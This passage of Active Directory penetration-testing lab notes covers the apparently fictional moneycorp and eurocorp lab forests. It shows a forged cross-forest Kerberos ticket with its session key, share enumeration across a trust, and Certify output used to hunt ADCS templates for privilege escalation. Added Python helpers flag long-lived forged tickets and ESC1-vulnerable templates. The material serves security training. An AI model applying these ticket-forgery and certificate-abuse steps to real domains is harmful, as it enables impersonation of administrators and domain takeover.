vzs3BtTpARPP9HBjwuL/0b5lmlN9Ug+3aW9S/8lstiu1Ke7NUv2ATYqaF8Cf2fe7GkPYmHPwsA5a7Oo0
hh2HNGVbIT9wLfOwDOYU3K8lPl2Edz/00w87EoB6ajkiMHHrVxmR+tIQK2qBChHWH/R5bVPoMH1Yx4y3
2qTwWW/h+/UZ329TyKX+1Hoe9Nx7fIH6RLu7NBO5J0Oy7l/ftJLcvYxpLmfPh9y7okjsdyQuoWsayCCG
6LVTF266W/6hg1itHzTbVf7p0RwCV6oY35YUiJS1+HuhYCgHrhWeusa4/bnGzPglwImv4xUc6MQzUWbm
sGXtwkGOsOZFvHFwxrkrEGDb0jsjWKdQNdoHl3IO6t8kHU4cA96i6lWX76stghR4LRO8tWVyF+JlLkNd
SJB/Ccc89wU27QuJ2dIlHb6XkIR/7ww45KoVSsBpkYCRbJQeWWJhSxIpLit/EbIfZH6lrkvXqVyw/VcV
x/769MVWFpX8mgHDJqYKrz2VMAuTVPvYbAOewUAvEsYKGU3+IF+hlLyWx2UW499bVFZ5Hs0tInMeYjjZ
zQJLyupJ/PTMc9ZRXAGNxWPfw1rkQXLhmZOrSVkfTI7lVvUnBIYNA3jCKZ5TGw6o9P/vydFL6AgOU46Z
MSc/k2DizriFt5Dh2F7QKqPpo4IBCDCCAQSgAwIBAKKB/ASB+X2B9jCB86CB8DCB7TCB6qArMCmgAwIB
EqEiBCDISP+KKKlkdzIUX3Omg8qOW/ifKJpPXupWXctuebtR3qEcGxpkb2xsYXJjb3JwLm1vbmV5Y29y
cC5sb2NhbKIaMBigAwIBAaERMA8bDWFkbWluaXN0cmF0b3KjBwMFAEClAAClERgPMjAyNDA3MDUwODI4
NDJaphEYDzIwMjQwNzA1MTgyODQyWqcRGA8yMDI0MDcxMjA4Mjg0MlqoEBsORVVST0NPUlAuTE9DQUyp
LTAroAMCAQKhJDAiGwRjaWZzGxpldXJvY29ycC1kYy5ldXJvY29ycC5sb2NhbA==

ServiceName : cifs/eurocorp-dc.eurocorp.local
ServiceRealm : EUROCORP.LOCAL
UserName : administrator
UserRealm : dollarcorp.moneycorp.local
StartTime : 7/5/2024 1:28:42 AM
EndTime : 7/5/2024 11:28:42 AM
RenewTill : 7/12/2024 1:28:42 AM
Flags : name_canonicalize, ok_as_delegate, pre_authent, renewable,
forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : yEj/iiipZHcyFF9zpoPKjlv4nyiaT17qVl3Lbnm7Ud4=

C:\Windows\system32>klist

Current LogonId is 0:0x16159e5

Cached Tickets: (1)

#0> Client: administrator @ dollarcorp.moneycorp.local


Server: cifs/eurocorp-dc.eurocorp.local @ EUROCORP.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate
name_canonicalize
Start Time: 7/5/2024 1:28:42 (local)
End Time: 7/5/2024 11:28:42 (local)
Renew Time: 7/12/2024 1:28:42 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called:
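Added triage example (not part of the notes and not mimikatz or Rubeus code): a Python helper that reads the `Lifetime` line printed by `kerberos::golden` above and the `StartTime` / `EndTime` / `RenewTill` lines printed by Rubeus, and flags any ticket whose validity window exceeds policy. We assume the Kerberos defaults as the domain policy (10-hour user ticket, 7-day renewal); the two inputs are copied from the tool output above. The forged inter-realm TGT carries a ten-year lifetime, while the service ticket the EUROCORP KDC issued against it respects policy, which is exactly the contrast a ticket-cache or KDC-log review looks for.

```python
"""Triage helper: flag Kerberos tickets whose validity exceeds domain policy.

Forged tickets are often minted with enormous lifetimes (the inter-realm TGT in
the notes is valid for ten years), whereas a KDC-issued ticket respects the
policy maximum. Assumed policy values are the Kerberos defaults: 10-hour ticket
life and a 7-day renewal window."""
import re
from datetime import datetime, timedelta

TIME_FMT = "%m/%d/%Y %I:%M:%S %p"   # the timestamp format mimikatz and Rubeus print

# Inputs copied from the tool output in the notes (page values, not constructed).
FORGED_LIFETIME_LINE = (
    "Lifetime : 7/5/2024 1:27:54 AM ; 7/3/2034 1:27:54 AM ; 7/3/2034 1:27:54 AM"
)
RUBEUS_TICKET_BLOCK = """\
ServiceName : cifs/eurocorp-dc.eurocorp.local
UserName : administrator
StartTime : 7/5/2024 1:28:42 AM
EndTime : 7/5/2024 11:28:42 AM
RenewTill : 7/12/2024 1:28:42 AM
"""


def parse_mimikatz_lifetime(line):
    """'Lifetime : start ; end ; renew-till' -> (start, end, renew_till)."""
    _, _, rest = line.partition(":")            # first ':' ends the label, not a time
    start, end, renew = (p.strip() for p in rest.split(";"))
    return tuple(datetime.strptime(p, TIME_FMT) for p in (start, end, renew))


def parse_rubeus_ticket(block):
    """Pull StartTime / EndTime / RenewTill out of a Rubeus ticket summary."""
    out = []
    for key in ("StartTime", "EndTime", "RenewTill"):
        m = re.search(rf"^{key}\s*:\s*(.+)$", block, re.MULTILINE)
        if not m:
            raise ValueError(f"{key} missing from ticket block")
        out.append(datetime.strptime(m.group(1).strip(), TIME_FMT))
    return tuple(out)


def lifetime_violations(start, end, renew_till,
                        max_ticket=timedelta(hours=10),
                        max_renew=timedelta(days=7)):
    """List policy violations for one ticket; an empty list means it is consistent."""
    issues = []
    if end - start > max_ticket:
        issues.append(f"ticket life {end - start} exceeds {max_ticket}")
    if renew_till - start > max_renew:
        issues.append(f"renewal window {renew_till - start} exceeds {max_renew}")
    return issues


if __name__ == "__main__":
    for label, times in (("forged TGT", parse_mimikatz_lifetime(FORGED_LIFETIME_LINE)),
                         ("KDC-issued TGS", parse_rubeus_ticket(RUBEUS_TICKET_BLOCK))):
        print(label, "->", lifetime_violations(*times) or "consistent with policy")
```

The same comparison can be run against the `Start Time` / `End Time` / `Renew Time` lines of `klist` on a host, or against the ticket end times visible to the KDC in a TGS-REQ; the heuristic is only as good as the policy values you feed it, so read the real values from the domain's Kerberos policy rather than relying on the defaults assumed here.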

We can only access those resources of the eurocorp.local domain that are explicitly shared with the dollarcorp.moneycorp.local (dcorp) domain. We therefore need to enumerate whether any resources in the other forest are accessible to users of the present forest. File shares can be enumerated with the net view command.
C:\Windows\system32>net view \\eurocorp-dc.eurocorp.local
Shared resources at \\eurocorp-dc.eurocorp.local

Share name Type Used as Comment

-------------------------------------------------------------------------------
NETLOGON Disk Logon server share
SharedwithDCorp Disk
SYSVOL Disk Logon server share
The command completed successfully.
C:\Windows\system32>dir \\eurocorp-dc.eurocorp.local\SharedwithDcorp
Volume in drive \\eurocorp-dc.eurocorp.local\SharedwithDcorp has no label.
Volume Serial Number is 1A5A-FDE2
Directory of \\eurocorp-dc.eurocorp.local\SharedwithDcorp

11/16/2022 05:26 AM <DIR> .


11/15/2022 07:17 AM 29 secret.txt
1 File(s) 29 bytes
1 Dir(s) 12,814,331,904 bytes free
ADCS abuse
Components of ADCS
CA - The certification authority that issues certificates. The server holding the ADCS role is the CA.

Certificate - Issued to a user or a machine; can be used for authentication, signing, encryption etc.

CSR - Certificate signing request made by a client to the CA to request a certificate.

Certificate Template - Defines the settings for a certificate. Contains information such as enrollment permissions,
EKUs, expiry etc.

EKU OIDs - Extended Key Usage object identifiers. These dictate what a certificate issued from the template may be
used for (Client Authentication, Smartcard Logon, SubCA etc.)

Enumerating ADCS
Enumeration can be done using Certify.exe.

certify.exe cas → Enumerates the certificate authorities (CAs) in the target forest.
C:\Windows\system32>"C:\AD\Tools\Certify.exe" cas

_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.0.0

[*] Action: Find certificate authorities


[*] Using the search base 'CN=Configuration,DC=moneycorp,DC=local'

[*] Root CAs

Cert SubjectName : CN=moneycorp-MCORP-DC-CA, DC=moneycorp, DC=local


Cert Thumbprint : 8DA9C3EF73450A29BEB2C77177A5B02D912F7EA8
Cert Serial : 48D51C5ED50124AF43DB7A448BF68C49
Cert Start Date : 11/26/2022 1:59:16 AM
Cert End Date : 11/26/2032 2:09:15 AM
Cert Chain : CN=moneycorp-MCORP-DC-CA,DC=moneycorp,DC=local

[*] NTAuthCertificates - Certificates that enable authentication:

Cert SubjectName : CN=moneycorp-MCORP-DC-CA, DC=moneycorp, DC=local


Cert Thumbprint : 8DA9C3EF73450A29BEB2C77177A5B02D912F7EA8
Cert Serial : 48D51C5ED50124AF43DB7A448BF68C49
Cert Start Date : 11/26/2022 1:59:16 AM
Cert End Date : 11/26/2032 2:09:15 AM
Cert Chain : CN=moneycorp-MCORP-DC-CA,DC=moneycorp,DC=local

[*] Enterprise/Enrollment CAs:

Enterprise CA Name : moneycorp-MCORP-DC-CA


DNS Hostname : mcorp-dc.moneycorp.local
FullName : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Flags : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
Cert SubjectName : CN=moneycorp-MCORP-DC-CA, DC=moneycorp, DC=local
Cert Thumbprint : 8DA9C3EF73450A29BEB2C77177A5B02D912F7EA8
Cert Serial : 48D51C5ED50124AF43DB7A448BF68C49
Cert Start Date : 11/26/2022 1:59:16 AM
Cert End Date : 11/26/2032 2:09:15 AM
Cert Chain : CN=moneycorp-MCORP-DC-CA,DC=moneycorp,DC=local
[!] UserSpecifiedSAN : EDITF_ATTRIBUTESUBJECTALTNAME2 set, enrollees can specify Subject
Alternative Names!
CA Permissions :
Owner: BUILTIN\Administrators S-1-5-32-544

Access Rights Principal

Allow Enroll NT AUTHORITY\Authenticated UsersS-1-5-11


Allow ManageCA, ManageCertificates BUILTIN\Administrators S-1-5-32-
544
Allow ManageCA, ManageCertificates mcorp\Domain Admins S-1-5-21-
335606122-960912869-3279953914-512
Allow ManageCA, ManageCertificates mcorp\Enterprise Admins S-1-5-21-
335606122-960912869-3279953914-519
Enrollment Agent Restrictions : None

Enabled Certificate Templates:


CA-Integration
HTTPSCertificates
SmartCardEnrollment-Agent
SmartCardEnrollment-Users
DirectoryEmailReplication
DomainControllerAuthentication
KerberosAuthentication
EFSRecovery
EFS
DomainController
WebServer
Machine
User
SubCA
Administrator

Certify completed in 00:00:38.4951036


certify.exe find → Enumerate the certificate templates

certify.exe find /vulnerable → Enumerate the vulnerable templates


Common misconfigurations that provide a domain privilege escalation path
• The CA grants normal / low-privileged users enrollment rights

• Manager approval is disabled

• Authorization signatures are not required

• The target template grants normal / low-privileged users enrollment rights.

Enrollee can enroll certificate for any user


One common misconfiguration in Active Directory Certificate Services (AD CS) is allowing the "Enrollee
can enroll certificate for any user" condition. Ideally, users should only be able to request certificates for
themselves. However, if a certificate template is configured to allow the enrollee to supply the subject,
users can request certificates on behalf of any user, including high-privilege accounts like Domain Admins
or Enterprise Admins.

Explanation of the Misconfiguration

1. Certificate Template Setting:

o The certificate template has a setting that allows the enrollee to supply the subject.

o This means that when a user requests a certificate, they can specify the subject name (the
name of the user for whom the certificate is being requested).

2. Potential Abuse:

o If this setting is enabled, a user with enrollment rights on this certificate template can request a
certificate for any user in the domain.

o This includes high-privilege users like Domain Admins or Enterprise Admins.

o The requested certificate can then be used to authenticate as the specified user.

3. Security Risk:

o This misconfiguration poses a significant security risk, as it allows an attacker to
impersonate high-privilege accounts.

o The attacker can use the obtained certificate to request a Ticket Granting Ticket (TGT)
from the Kerberos Key Distribution Center (KDC), effectively gaining the same privileges
as the impersonated user.
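Added audit example (not code from the notes or from Certify): a Python script that applies the misconfiguration checklist above to `certify.exe find` output and flags a template only when every condition holds, i.e. low-privileged enrollment rights, no manager approval, no authorized signatures, the enrollee supplies the subject, and an EKU that permits authentication (the combination commonly catalogued as ESC1). It generalises the single "enrollee supplies subject" case discussed above to the full checklist. The sample input is constructed in the shape of Certify's listing: the `User` record mirrors the listing in the notes, and `Lab-ESC1-Example` is a hypothetical template included only to show what a flagged entry looks like.

```python
"""Audit helper: apply the notes' misconfiguration checklist to certify.exe 'find' output.

A template is flagged when ALL of these hold (the pattern commonly catalogued as ESC1):
  1. a broad, low-privileged principal has enrollment rights,
  2. manager approval is off (no PEND_ALL_REQUESTS in mspki-enrollment-flag),
  3. no authorized signatures are required,
  4. ENROLLEE_SUPPLIES_SUBJECT is set in msPKI-Certificates-Name-Flag,
  5. the EKU list permits authentication (or is empty, which means any purpose).
"""

# Constructed sample in the shape of `certify.exe find` output (not a real dump).
# "User" mirrors the template listing in the notes; "Lab-ESC1-Example" is a
# hypothetical template added only to show what a flagged entry looks like.
SAMPLE = """\
CA Name : mcorp-dc.moneycorp.local\\moneycorp-MCORP-DC-CA
Template Name : User
Schema Version : 1
msPKI-Certificates-Name-Flag : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_ALT_REQUIRE_EMAIL
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Encrypting File System, Secure Email
Permissions
Enrollment Permissions
Enrollment Rights : mcorp\\Domain Admins S-1-5-21-335606122-960912869-3279953914-512
 mcorp\\Domain Users S-1-5-21-335606122-960912869-3279953914-513

CA Name : mcorp-dc.moneycorp.local\\moneycorp-MCORP-DC-CA
Template Name : Lab-ESC1-Example
Schema Version : 2
msPKI-Certificates-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication
Permissions
Enrollment Permissions
Enrollment Rights : NT AUTHORITY\\Authenticated Users S-1-5-11
"""

LOW_PRIV_SIDS = {"S-1-5-11", "S-1-1-0"}      # Authenticated Users, Everyone
LOW_PRIV_RIDS = {"513", "515"}                # Domain Users, Domain Computers
AUTH_EKUS = {"Client Authentication", "Smart Card Logon",
             "PKINIT Client Authentication", "Any Purpose"}
SECTION_HEADERS = {"Permissions", "Enrollment Permissions",
                   "Object Control Permissions"}


def parse_templates(text):
    """Split Certify output into one dict of 'Key : Value' fields per template.

    Lines without ' : ' are continuations of the previous field (Certify prints
    one principal per line under 'Enrollment Rights')."""
    templates, current, ca_name, last_key = [], None, None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line in SECTION_HEADERS:
            last_key = None
            continue
        if " : " in line:
            key, value = (p.strip() for p in line.split(" : ", 1))
            if key == "CA Name":                # a new CA block starts a new record
                ca_name, current = value, None
            elif key == "Template Name":
                current = {"Template Name": value, "CA Name": ca_name}
                templates.append(current)
            elif current is not None:
                current[key] = value
            last_key = key
        elif current is not None and last_key:
            current[last_key] += "\n" + line
    return templates


def low_priv_enrollment(rights):
    """True if any enrollment principal is a broad, low-privileged group."""
    for entry in rights.splitlines():
        sid = entry.split()[-1]                 # Certify prints '<name> <SID>'
        if sid in LOW_PRIV_SIDS or sid.rsplit("-", 1)[-1] in LOW_PRIV_RIDS:
            return True
    return False


def esc1_conditions(tpl):
    """Return the names of the checklist conditions this template satisfies."""
    ekus = {e.strip() for e in tpl.get("pkiextendedkeyusage", "").split(",")
            if e.strip() and e.strip() != "<null>"}
    checks = {
        "low-privileged enrollment": low_priv_enrollment(tpl.get("Enrollment Rights", "")),
        "no manager approval": "PEND_ALL_REQUESTS" not in tpl.get("mspki-enrollment-flag", ""),
        "no authorized signatures": tpl.get("Authorized Signatures Required", "0") == "0",
        "enrollee supplies subject":
            "ENROLLEE_SUPPLIES_SUBJECT" in tpl.get("msPKI-Certificates-Name-Flag", ""),
        "authentication EKU": not ekus or bool(ekus & AUTH_EKUS),
    }
    return [name for name, hit in checks.items() if hit]


def audit(text):
    """Map template name -> True when every ESC1 condition holds."""
    return {t["Template Name"]: len(esc1_conditions(t)) == 5
            for t in parse_templates(text)}


if __name__ == "__main__":
    for tpl in parse_templates(SAMPLE):
        hits = esc1_conditions(tpl)
        print("FLAG" if len(hits) == 5 else "ok  ", tpl["Template Name"], "->", ", ".join(hits))
```

When feeding real Certify output that has been copied out of a PDF (as in these notes), rejoin SIDs that were wrapped across lines first, otherwise the principal check sees a truncated SID. The remediation follows directly from the conditions checked: remove `ENROLLEE_SUPPLIES_SUBJECT` from templates that allow authentication, require manager approval or authorized signatures, or restrict enrollment to the groups that genuinely need it.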
C:\Windows\system32>C:\AD\Tools\certify.exe find /enrolleesuppliessubject

_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.0.0

[*] Action: Find certificate templates


[*] Using the search base 'CN=Configuration,DC=moneycorp,DC=local'

[*] Listing info about the Enterprise CA 'moneycorp-MCORP-DC-CA'

Enterprise CA Name : moneycorp-MCORP-DC-CA


DNS Hostname : mcorp-dc.moneycorp.local
FullName : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Flags : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
Cert SubjectName : CN=moneycorp-MCORP-DC-CA, DC=moneycorp, DC=local
Cert Thumbprint : 8DA9C3EF73450A29BEB2C77177A5B02D912F7EA8
Cert Serial : 48D51C5ED50124AF43DB7A448BF68C49
Cert Start Date : 11/26/2022 1:59:16 AM
Cert End Date : 11/26/2032 2:09:15 AM
Cert Chain : CN=moneycorp-MCORP-DC-CA,DC=moneycorp,DC=local
[!] UserSpecifiedSAN : EDITF_ATTRIBUTESUBJECTALTNAME2 set, enrollees can specify Subject
Alternative Names!
CA Permissions :
Owner: BUILTIN\Administrators S-1-5-32-544

Access Rights Principal

Allow Enroll NT AUTHORITY\Authenticated UsersS-1-5-11


Allow ManageCA, ManageCertificates BUILTIN\Administrators S-1-5-32-
544
Allow ManageCA, ManageCertificates mcorp\Domain Admins S-1-5-21-
335606122-960912869-3279953914-512
Allow ManageCA, ManageCertificates mcorp\Enterprise Admins S-1-5-21-
335606122-960912869-3279953914-519
Enrollment Agent Restrictions : None

[*] Available Certificates Templates :

CA Name : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Template Name : User
Schema Version : 1
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificates-Name-Flag : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_ALT_REQUIRE_EMAIL,
SUBJECT_REQUIRE_EMAIL, SUBJECT_REQUIRE_DIRECTORY_PATH
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS,
AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Encrypting File System, Secure
Email
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Domain Users S-1-5-21-335606122-960912869-
3279953914-513
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
Object Control Permissions
Owner : mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
WriteOwner Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
WriteDacl Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
WriteProperty Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519

CA Name : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Template Name : EFS
Schema Version : 1
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificates-Name-Flag : SUBJECT_ALT_REQUIRE_UPN,
SUBJECT_REQUIRE_DIRECTORY_PATH
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS,
AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Encrypting File System
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Domain Users S-1-5-21-335606122-960912869-
3279953914-513
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
Object Control Permissions
Owner : mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
WriteOwner Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
WriteDacl Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
WriteProperty Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519

CA Name : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Template Name : Administrator
Schema Version : 1
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificates-Name-Flag : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_ALT_REQUIRE_EMAIL,
SUBJECT_REQUIRE_EMAIL, SUBJECT_REQUIRE_DIRECTORY_PATH
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS,
AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Encrypting File System,
Microsoft Trust List Signing, Secure Email
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
Object Control Permissions
Owner : mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
WriteOwner Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
WriteDacl Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
WriteProperty Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519

CA Name : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Template Name : EFSRecovery
Schema Version : 1
Validity Period : 5 years
Renewal Period : 6 weeks
msPKI-Certificates-Name-Flag : SUBJECT_ALT_REQUIRE_UPN,
SUBJECT_REQUIRE_DIRECTORY_PATH
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : File Recovery
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
Object Control Permissions
Owner : mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
WriteOwner Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
WriteDacl Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
WriteProperty Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519

CA Name : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Template Name : Machine
Schema Version : 1
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificates-Name-Flag : SUBJECT_ALT_REQUIRE_DNS, SUBJECT_REQUIRE_DNS_AS_CN
mspki-enrollment-flag : AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Server Authentication
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Domain Computers S-1-5-21-335606122-960912869-
3279953914-515
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
Object Control Permissions
Owner : mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
WriteOwner Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
WriteDacl Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
WriteProperty Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519

CA Name : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Template Name : DomainController
Schema Version : 1
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificates-Name-Flag : SUBJECT_ALT_REQUIRE_DIRECTORY_GUID,
SUBJECT_ALT_REQUIRE_DNS, SUBJECT_REQUIRE_DNS_AS_CN
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS,
AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Server Authentication
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Domain Controllers S-1-5-21-335606122-960912869-
3279953914-516
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
mcorp\Enterprise Read-only Domain Controllers S-1-5-21-
335606122-960912869-3279953914-498
NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS S-1-5-9
Object Control Permissions
Owner : mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
WriteOwner Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
WriteDacl Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
WriteProperty Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519

CA Name : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Template Name : WebServer
Schema Version : 1
Validity Period : 2 years
Renewal Period : 6 weeks
msPKI-Certificates-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : NONE
Authorized Signatures Required : 0
pkiextendedkeyusage : Server Authentication
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
Object Control Permissions
Owner : mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
WriteOwner Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
WriteDacl Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
WriteProperty Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519

CA Name : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Template Name : SubCA
Schema Version : 1
Validity Period : 5 years
Renewal Period : 6 weeks
msPKI-Certificates-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : NONE
Authorized Signatures Required : 0
pkiextendedkeyusage : <null>
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
Object Control Permissions
Owner : mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
WriteOwner Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
WriteDacl Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
WriteProperty Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519

CA Name : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Template Name : DomainControllerAuthentication
Schema Version : 2
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificates-Name-Flag : SUBJECT_ALT_REQUIRE_DNS
mspki-enrollment-flag : AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Server Authentication, Smart
Card Logon
mspki-certificate-application-policy : Client Authentication, Server Authentication, Smart
Card Logon
Permissions
Enrollment Permissions
Enrollment Rights : mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Domain Controllers S-1-5-21-335606122-960912869-
3279953914-516
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
mcorp\Enterprise Read-only Domain Controllers S-1-5-21-
335606122-960912869-3279953914-498
